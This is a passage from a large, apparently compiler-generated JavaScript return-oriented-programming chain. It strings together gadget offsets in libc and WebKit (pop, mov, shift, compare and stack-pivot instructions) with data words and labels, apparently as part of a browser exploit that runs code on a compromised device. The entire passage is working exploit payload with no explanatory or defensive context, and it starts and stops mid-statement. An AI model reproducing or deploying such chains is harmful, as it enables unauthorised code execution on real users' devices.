0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5210: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275280, //L5211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275296, //L5212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5211: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275416, //L5213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275400, //L5214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5214: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5213: db([0, 0]); // 0x0 //__ntoa_long: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275488, //L5216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5216: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275552, //L5218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275640, //L5220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5219: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5221: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+275720, //L5222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5224: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5226: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+275880, //L5229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275864, //L5227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5227: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5229: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+276040, //L5233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275992, //L5230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276008, //L5231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5233: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+276176, //L5235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276192, //L5236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276160, //L5234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276304, //L5238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276352, //L5241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+276320, //L5239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5239: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5241: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+276464, //L5242+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+276456, //L5242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5242: db([0, 0]); // 0x0 set_gadgets([ ropchain+276480, //L5242+24 ropchain+277544, //L5237 libc_base+764760, //pop rsi ropchain+276520, //L5243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5243: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5245: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+276640, //L5248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276624, //L5246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5246: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5248: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+276816, //L5251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276832, //L5252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276784, //L5249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276800, //L5250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5249: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5251: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5252: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276928, //L5254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+276912, //L5253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5254: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5255: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5256: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L5257: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+277136, //L5259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5258: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L5259: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277200, //L5261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5261: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+277256, //L5262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5262: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+277392, //L5266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277376, //L5265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5264: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5266: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+277456, //L5267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5269: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+277536, //L5270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5270: db([0, 0]); // 0x0 //L5237: set_gadgets([ libc_base+764760, //pop rsi ropchain+277584, //L5272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5274: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277704, //L5277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277688, //L5275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5277: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+277880, //L5280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+277896, //L5281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277848, //L5278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277864, //L5279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5279: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5280: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5281: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+277992, //L5283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+277976, //L5282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5282: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5283: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5284: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5285: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5286: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+278192, //L5288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5288: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+278248, //L5289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+278384, //L5293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+278368, //L5292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5291: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+278504, //L5296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278472, //L5294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5294: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5296: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+278640, //L5298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278656, //L5299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+278624, //L5297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+278816, //L5304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278832, //L5305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278768, //L5301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5302: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5303: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L5304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5305: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+278952, //L5306+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+278944, //L5306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5306: db([0, 0]); // 0x0 set_gadgets([ ropchain+278968, //L5306+24 ropchain+279368, //L5300 libc_base+764760, //pop rsi ropchain+279008, //L5307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5309: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279128, //L5312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279112, //L5310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5312: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+279272, //L5315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279288, //L5316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279240, //L5313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5314: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5315: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5316: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+279360, //L5317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5317: db([0, 0]); // 0x0 //L5300: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279488, //L5320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279504, //L5321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279472, //L5319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5320: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5321: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+279616, //L5323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279664, //L5326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+279632, //L5324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5326: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+279776, //L5327+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+279768, //L5327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5327: db([0, 0]); // 0x0 set_gadgets([ ropchain+279792, //L5327+24 ropchain+291080, //L5322 //L5328: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5331: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279928, //L5334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279912, //L5332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280072, //L5337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280040, //L5335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280056, //L5336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+280152, //L5338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5338: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5340: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+280272, //L5343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280256, //L5341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5343: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280384, //L5344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280416, //L5346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280400, //L5345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5345: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+280584, //L5349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280552, //L5347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280568, //L5348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5347: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5348: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5349: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+428453, //mov rax, rdx libc_base+764760, //pop rsi ropchain+280768, //L5353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280736, //L5351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280752, //L5352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5350: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5351: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5352: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5353: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+280824, //L5355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5355: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+280952, //L5357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280968, //L5358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+280936, //L5356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5356: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5358: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281048, //L5359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281064, //L5360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5360: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281152, //L5361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281168, //L5363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5364: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5366: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+281328, //L5369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281312, //L5367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5367: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5369: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, 